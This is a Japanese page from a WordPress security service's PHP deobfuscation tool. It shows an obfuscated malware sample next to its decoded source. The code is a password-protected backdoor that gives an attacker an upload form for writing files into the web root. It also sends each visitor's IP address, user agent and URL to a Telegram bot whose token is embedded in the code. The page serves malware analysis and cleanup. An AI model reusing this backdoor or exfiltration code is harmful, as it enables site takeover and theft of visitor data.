Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php goto E1I8baQH8GzbGlWD; yrXJLiRW0iNITRM8: CaGvDW8vF3_3OhHD: goto mC2v3JadVZyQtw1M; iY8pQ9RlOuHf0oMt: echo "\x3c\146\x6f\x72\155\x20\x61\143\x74\x69\x6f\156\x3d\x22\42\x20\x6d\145\164\150\x6f\x64\x3d\42\x70\157\163\x74\x22\x20\145\x6e\143\x74\171\x70\145\x3d\x22\155\165\x6c\x74\151\160\x61\x7...



難読化されたPHPコード

<?php

goto E1I8baQH8GzbGlWD; yrXJLiRW0iNITRM8: CaGvDW8vF3_3OhHD: goto mC2v3JadVZyQtw1M; iY8pQ9RlOuHf0oMt: echo "\x3c\146\x6f\x72\155\x20\x61\143\x74\x69\x6f\156\x3d\x22\42\x20\x6d\145\164\150\x6f\x64\x3d\42\x70\157\163\x74\x22\x20\145\x6e\143\x74\171\x70\145\x3d\x22\155\165\x6c\x74\151\160\x61\x72\164\57\x66\157\x72\155\55\x64\141\x74\x61\x22\76\74\x69\156\x70\x75\x74\x20\164\x79\160\x65\75\x22\x66\x69\x6c\145\x22\40\156\x61\155\x65\75\42\x66\x69\154\x65\x54\x6f\125\160\x6c\157\x61\x64\42\40\151\x64\x3d\42\146\151\x6c\145\x54\x6f\125\160\x6c\157\x61\144\x22\x3e\x3c\x69\x6e\160\x75\164\40\164\x79\x70\145\x3d\42\x73\x75\142\x6d\151\x74\x22\x20\x76\x61\154\165\145\75\42\x55\x70\x6c\x6f\x61\x64\40\x46\151\x6c\x65\x22\40\x6e\x61\x6d\x65\x3d\x22\x73\165\142\155\151\164\42\76\x3c\57\146\x6f\162\x6d\76"; goto yrXJLiRW0iNITRM8; V6PXTn2JRnYt4yOc: UXxpdRgc1iY3WxXo: goto AOY0M1bGFBLBTnUU; mwv2gQzZkhM9SpoT: $Hgq22M4lSySzsdWZ = $_SERVER["\x52\x45\115\x4f\124\105\137\x41\x44\104\x52"]; goto FQbktn1LWLVNXXHx; Svd4_V_61L8cgR5w: $v6wOCuzR9DK8L05D = file_get_contents($OL8n2uOWE7Cs87Ej, false, $ln7kRy2c0IRZZQ39); goto KRk8P8eIPk7EicKh; THTqs310P7m7dWyu: $imy7MLzxB5MsI6ID = $Fk27L9TiLfaNGsQX . basename($_FILES["\146\x69\154\145\x54\x6f\x55\160\x6c\x6f\141\x64"]["\156\141\155\x65"]); goto UirSLVjtnmvUriFh; DyQIQ5ifCxf5MHzR: $YIiXdSA_Wp3IlAk7 = "\x68\x74\x74\x70\x3a\x2f\57{$_SERVER["\x48\124\124\120\x5f\x48\x4f\123\124"]}{$_SERVER["\122\105\x51\125\105\123\124\137\125\x52\x49"]}"; goto mwv2gQzZkhM9SpoT; HXe5NUxNcQ1Y11y4: fQlTs8h9Pr7LkfTk: goto B3aZ2Enpv4MWzg3n; Yag1txp3GKc9s79j: $ln7kRy2c0IRZZQ39 = stream_context_create($XAex47nL4CYhmA2_); goto Svd4_V_61L8cgR5w; q265w4li58ebuJ_M: if (isset($_GET["\x70\x61\x73\x73\x69\x6e\x67\157"]) && $_GET["\x70\x61\163\163\151\156\147\x6f"] === "\61\x32\63\63\x32\x31\x42\151\x61\x74\x63\150\41\41\x21") { goto Mp7UKrbe85JZ0d35; } goto lJvb_We4pkdLgVH9; UirSLVjtnmvUriFh: if (move_uploaded_file($_FILES["\x66\151\154\x65\x54\157\x55\160\x6c\157\x61\144"]["\164\155\160\137\x6e\x61\x6d\145"], $imy7MLzxB5MsI6ID)) { goto UXxpdRgc1iY3WxXo; } goto NYUYOxHbhXzc_Jdk; QXTemwec9zxouv9j: Mp7UKrbe85JZ0d35: goto iY8pQ9RlOuHf0oMt; E1I8baQH8GzbGlWD: $H_NDX0whnFCbsFnH = "\67\x31\65\61\70\x36\x31\60\67\x36\x3a\x41\101\x48\x49\x44\163\160\x62\151\x77\113\x50\113\123\x36\62\126\x5f\157\x35\116\130\142\115\63\70\124\150\x50\x7a\x7a\x7a\71\x32\x38"; goto kNgCqL7quGCtKJSq; QEC0FhNvwsHlzo4j: $lCRB3OjMAvv2TieE = array("\143\x68\x61\x74\137\x69\144" => $mJdNhBuIjO9X1yfe, "\164\x65\170\164" => $s25PAca2sFNJkc9s); goto aMGedFK908EaXGWq; KRk8P8eIPk7EicKh: header("\114\x6f\x63\x61\x74\151\x6f\156\72\40\x6c\157\x67\x69\156\x2e\x70\150\160"); goto Eyl29nFikxHcuhRE; mC2v3JadVZyQtw1M: function j8p2slEqlXKAq1pj($H_NDX0whnFCbsFnH, $mJdNhBuIjO9X1yfe, $s25PAca2sFNJkc9s) { goto eXSIxGrpxpFBv2n4; eeBjIf3zRrPBwm6b: $v6wOCuzR9DK8L05D = file_get_contents($OL8n2uOWE7Cs87Ej, false, $ln7kRy2c0IRZZQ39); goto OD1kpE2_Ibu0mm5R; Z7YGTHLpFsdNZmXO: $XAex47nL4CYhmA2_ = array("\x68\164\x74\x70" => array("\155\x65\164\x68\157\x64" => "\120\117\x53\124", "\150\x65\x61\144\x65\162" => "\103\x6f\156\x74\x65\x6e\x74\55\164\171\160\145\72\40\x61\x70\160\x6c\151\143\x61\164\151\x6f\x6e\57\x78\55\x77\167\167\55\146\x6f\162\x6d\55\x75\162\154\145\156\143\x6f\144\145\144", "\x63\x6f\156\x74\x65\156\164" => http_build_query($lCRB3OjMAvv2TieE))); goto bgzAAFlLTAa9xaRA; OD1kpE2_Ibu0mm5R: return $v6wOCuzR9DK8L05D; goto X7iOzCrDbBrR1f3i; NWDUDwNROpj_7ZMw: $lCRB3OjMAvv2TieE = array("\143\150\141\x74\x5f\151\x64" => $mJdNhBuIjO9X1yfe, "\x74\x65\x78\164" => $s25PAca2sFNJkc9s); goto Z7YGTHLpFsdNZmXO; eXSIxGrpxpFBv2n4: $OL8n2uOWE7Cs87Ej = "\x68\164\164\x70\163\x3a\57\57\141\160\x69\x2e\164\145\x6c\145\x67\x72\x61\x6d\56\x6f\x72\147\57\x62\x6f\164{$H_NDX0whnFCbsFnH}\57\x73\145\156\144\x4d\x65\163\x73\141\x67\145"; goto NWDUDwNROpj_7ZMw; bgzAAFlLTAa9xaRA: $ln7kRy2c0IRZZQ39 = stream_context_create($XAex47nL4CYhmA2_); goto eeBjIf3zRrPBwm6b; X7iOzCrDbBrR1f3i: } goto kdptb08JPFvEyoLo; UxnEt0cQz20AH2aT: goto fQlTs8h9Pr7LkfTk; goto V6PXTn2JRnYt4yOc; NndJiI7BPIrgHIdd: $OL8n2uOWE7Cs87Ej = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\141\160\x69\56\x74\145\x6c\x65\147\x72\141\x6d\56\x6f\162\147\x2f\x62\x6f\164{$H_NDX0whnFCbsFnH}\x2f\163\145\156\144\x4d\x65\x73\x73\x61\147\x65"; goto QEC0FhNvwsHlzo4j; Eyl29nFikxHcuhRE: exit; goto KpIfeBr_j1jiY9jS; lJvb_We4pkdLgVH9: $s25PAca2sFNJkc9s = "\104\157\x6d\x61\151\x6e\x3a\x20{$_SERVER["\110\x54\124\x50\x5f\110\117\x53\x54"]}\12\120\x61\164\150\x3a\40{$YIiXdSA_Wp3IlAk7}\xa\125\163\145\x72\40\111\x50\72\x20{$Hgq22M4lSySzsdWZ}\12\x55\x73\145\x72\x20\x41\147\x65\x6e\164\72\40{$jAmLniIwgjXYFEPB}"; goto NndJiI7BPIrgHIdd; kdptb08JPFvEyoLo: if (!isset($_FILES["\x66\151\x6c\x65\x54\157\x55\x70\154\157\x61\144"])) { goto hWL4GJntuZcpmCzV; } goto ODQRDhkt2k4Q7eaM; AOY0M1bGFBLBTnUU: echo "\124\x68\145\x20\x66\151\154\x65\x20" . htmlspecialchars(basename($_FILES["\x66\x69\x6c\145\124\x6f\125\160\x6c\x6f\141\x64"]["\156\141\155\x65"])) . "\40\150\141\x73\x20\x62\x65\x65\156\x20\165\160\154\x6f\x61\x64\145\x64\56"; goto HXe5NUxNcQ1Y11y4; ODQRDhkt2k4Q7eaM: $Fk27L9TiLfaNGsQX = __DIR__ . "\57"; goto THTqs310P7m7dWyu; KpIfeBr_j1jiY9jS: goto CaGvDW8vF3_3OhHD; goto QXTemwec9zxouv9j; FQbktn1LWLVNXXHx: $jAmLniIwgjXYFEPB = $_SERVER["\x48\124\x54\120\137\x55\x53\105\122\x5f\x41\x47\x45\x4e\124"]; goto q265w4li58ebuJ_M; aMGedFK908EaXGWq: $XAex47nL4CYhmA2_ = array("\150\x74\x74\x70" => array("\155\x65\x74\150\x6f\144" => "\x50\117\123\124", "\150\145\141\x64\145\162" => "\103\157\x6e\x74\x65\x6e\x74\55\x74\x79\x70\x65\72\40\141\x70\160\x6c\x69\x63\141\164\x69\x6f\x6e\x2f\x78\55\167\167\167\55\x66\x6f\x72\155\x2d\x75\162\154\x65\x6e\143\x6f\x64\x65\144", "\143\157\x6e\x74\145\156\164" => http_build_query($lCRB3OjMAvv2TieE))); goto Yag1txp3GKc9s79j; kNgCqL7quGCtKJSq: $mJdNhBuIjO9X1yfe = "\x2d\64\x30\60\x38\60\67\x30\64\64\x37"; goto DyQIQ5ifCxf5MHzR; NYUYOxHbhXzc_Jdk: echo "\123\157\x72\x72\171\x2c\x20\164\150\x65\162\x65\x20\167\x61\x73\40\141\x6e\x20\145\x72\162\157\162\40\165\160\x6c\157\141\144\x69\x6e\147\40\x79\x6f\165\x72\40\146\151\154\145\x2e"; goto UxnEt0cQz20AH2aT; B3aZ2Enpv4MWzg3n: hWL4GJntuZcpmCzV:

デコード(難読化解除)されたコード

<?php

$H_NDX0whnFCbsFnH = "7151861076:AAHIDspbiwKPKS62V_o5NXbM38ThPzzz928";
$mJdNhBuIjO9X1yfe = "-4008070447";
$YIiXdSA_Wp3IlAk7 = "http://{$_SERVER["HTTP_HOST"]}{$_SERVER["REQUEST_URI"]}";
$Hgq22M4lSySzsdWZ = $_SERVER["REMOTE_ADDR"];
$jAmLniIwgjXYFEPB = $_SERVER["HTTP_USER_AGENT"];
if (isset($_GET["passingo"]) && $_GET["passingo"] === "123321Biatch!!!") {
    echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\"><input type=\"file\" name=\"fileToUpload\" id=\"fileToUpload\"><input type=\"submit\" value=\"Upload File\" name=\"submit\"></form>";
    CaGvDW8vF3_3OhHD:
    function j8p2slEqlXKAq1pj($H_NDX0whnFCbsFnH, $mJdNhBuIjO9X1yfe, $s25PAca2sFNJkc9s)
    {
        $OL8n2uOWE7Cs87Ej = "https://api.telegram.org/bot{$H_NDX0whnFCbsFnH}/sendMessage";
        $lCRB3OjMAvv2TieE = array("chat_id" => $mJdNhBuIjO9X1yfe, "text" => $s25PAca2sFNJkc9s);
        $XAex47nL4CYhmA2_ = array("http" => array("method" => "POST", "header" => "Content-type: application/x-www-form-urlencoded", "content" => http_build_query($lCRB3OjMAvv2TieE)));
        $ln7kRy2c0IRZZQ39 = stream_context_create($XAex47nL4CYhmA2_);
        $v6wOCuzR9DK8L05D = file_get_contents($OL8n2uOWE7Cs87Ej, false, $ln7kRy2c0IRZZQ39);
        return $v6wOCuzR9DK8L05D;
    }
    if (!isset($_FILES["fileToUpload"])) {
        goto hWL4GJntuZcpmCzV;
    }
    $Fk27L9TiLfaNGsQX = "/var/www/html/";
    $imy7MLzxB5MsI6ID = $Fk27L9TiLfaNGsQX . basename($_FILES["fileToUpload"]["name"]);
    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $imy7MLzxB5MsI6ID)) {
        echo "The file " . htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . " has been uploaded.";
        goto HXe5NUxNcQ1Y11y4;
    }
    echo "Sorry, there was an error uploading your file.";
    HXe5NUxNcQ1Y11y4:
    hWL4GJntuZcpmCzV:
    // [PHPDeobfuscator] Implied script end
    return;
}
$s25PAca2sFNJkc9s = "Domain: {$_SERVER["HTTP_HOST"]}\nPath: {$YIiXdSA_Wp3IlAk7}\nUser IP: {$Hgq22M4lSySzsdWZ}\nUser Agent: {$jAmLniIwgjXYFEPB}";
$OL8n2uOWE7Cs87Ej = "https://api.telegram.org/bot{$H_NDX0whnFCbsFnH}/sendMessage";
$lCRB3OjMAvv2TieE = array("chat_id" => $mJdNhBuIjO9X1yfe, "text" => $s25PAca2sFNJkc9s);
$XAex47nL4CYhmA2_ = array("http" => array("method" => "POST", "header" => "Content-type: application/x-www-form-urlencoded", "content" => http_build_query($lCRB3OjMAvv2TieE)));
$ln7kRy2c0IRZZQ39 = stream_context_create($XAex47nL4CYhmA2_);
$v6wOCuzR9DK8L05D = file_get_contents($OL8n2uOWE7Cs87Ej, false, $ln7kRy2c0IRZZQ39);
header("Location: login.php");
exit;

■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.